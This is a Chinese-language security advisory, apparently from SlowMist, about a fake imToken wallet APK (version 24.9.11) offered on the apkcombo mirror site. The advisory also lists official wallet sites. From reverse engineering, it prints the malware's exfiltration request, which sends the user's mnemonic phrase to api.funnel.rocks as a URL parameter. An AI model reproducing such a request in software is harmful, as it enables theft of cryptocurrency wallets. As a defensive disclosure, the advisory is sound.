Time:2023-04-25 Click:160
原文作者: 山 & 耀
当你通过钱包在 Web3 世界中探索体验诸多的区块链相关应用和网站的过程中,你会发现在一条公链上每个应用都是使用钱包 “登录”;这与我们传统意义上的 “登录” 不同,在 Web2 世界中,每个应用之间的账户不全是互通的。但在 Web3 的世界中,所有应用都是统一使用钱包去进行 “登录”,我们可以看到 “登录” 钱包时显示的不是 “Login with Wallet”,取而代之的是 “Connect Wallet”。而钱包是你在 Web3 世界中的唯一通行证。
俗话说高楼之下必有阴影,在如此火热的 Web3 世界里,钱包作为入口级应用,自然也被黑灰产业链盯上。
在 Android 环境下,由于很多手机不支持 Google Play 或者因为网络问题,很多人会从其他途径下载 Google Play 的应用,比如:apkcombo、apkpure 等第三方下载站,这些站点往往标榜自己 App 是从 Google Play 镜像下载的,但是其真实安全性如何呢?
据数据统计站点 similarweb 统计,apkcombo 站点:
全球排名: 1, 809
国家排名: 7, 370
品类排名: 168
我们可以看到它的影响力和流量都非常大。
它默认提供了一款 chrome APK 下载插件,我们发现这款插件的用户数达到了 10 W :
那么回到我们关注的 Web3 领域中钱包方向,用户如果从这里下载的钱包应用安全性如何?
我们拿知名的 imToken 钱包为例,其 Google Play 的正规下载途径为:
https://play.google.com/store/apps/details? id=im.token.app
由于很多手机不支持 Google Play 或者因为网络问题,很多人会从这里下载 Google Play 的应用。
而 apkcombo 镜像站的下载路径为:
https://apkcombo.com/downloader/#package=im.token.app
上图我们可以发现,apkcombo 提供的版本为 24.9.11 ,经由 imToken 确认后,这是一个并不存在的版本!证实这是目前市面上假 imToken 钱包最多的一个版本。
在编写本文时 imToken 钱包的最新版本为 2.11.3 ,此款钱包的版本号很高,显然是为了伪装成一个最新版本而设置的。
如下图,我们在 apkcombo 上发现,此假钱包版本显示下载量较大,此处的下载量应该是爬取的 Google Play 的下载量信息,安全起见,我们觉得有必要披露这个恶意 App 的来源,防止更多的人下载到此款假钱包。
同时我们发现类似的下载站还有如:uptodown
下载地址:https://imtoken.br.uptodown.com/android
我们发现 uptodown 任意注册即可发布 App,这导致钓鱼的成本变得极低:
我们仅对 apkcombo 提供版本为 24.9.11 这款假钱包进行分析,在开始界面创建钱包或导入钱包助记词时,虚假钱包会将助记词等信息发送到钓鱼网站的服务端去,如下图:
根据逆向 APK 代码和实际分析流量包发现,助记词发送方式:
https://api.funnel.rocks/api/trust? aid= 10&wt= 1&os= 1&key=<助记词>
看下图,最早的 “api.funnel.rocks” 证书出现在 2022-06-03 ,也就是攻击开始的大概时间:
俗话说一图胜千言,最后我们画一个流程图:
同时,如需使用钱包,请务必认准以下主流钱包 App 官方网址:
1 /imToken 钱包:https://token.im/
2 /TokenPocket 钱包:https://www.tokenpocket.pro/
3 /TronLink 钱包:https://www.tronlink.org/
4 /比特派钱包:https://bitpie.com/
5 /MetaMask 钱包:https://metamask.io/
6 /Trust Wallet:https://trustwallet.com/
请持续关注慢雾安全团队,更多 Web3 安全风险分析与告警正在路上。
致谢:感谢在溯源过程中 imToken 官方提供的验证支持。
由于保密性和隐私性,本文只是冰山一角。慢雾在此建议,用户需加强对安全知识的了解,进一步强化甄别网络钓鱼攻击的能力等,避免遭遇此类攻击。更多的安全知识建议阅读慢雾出品的《区块链黑暗森林自救手册》。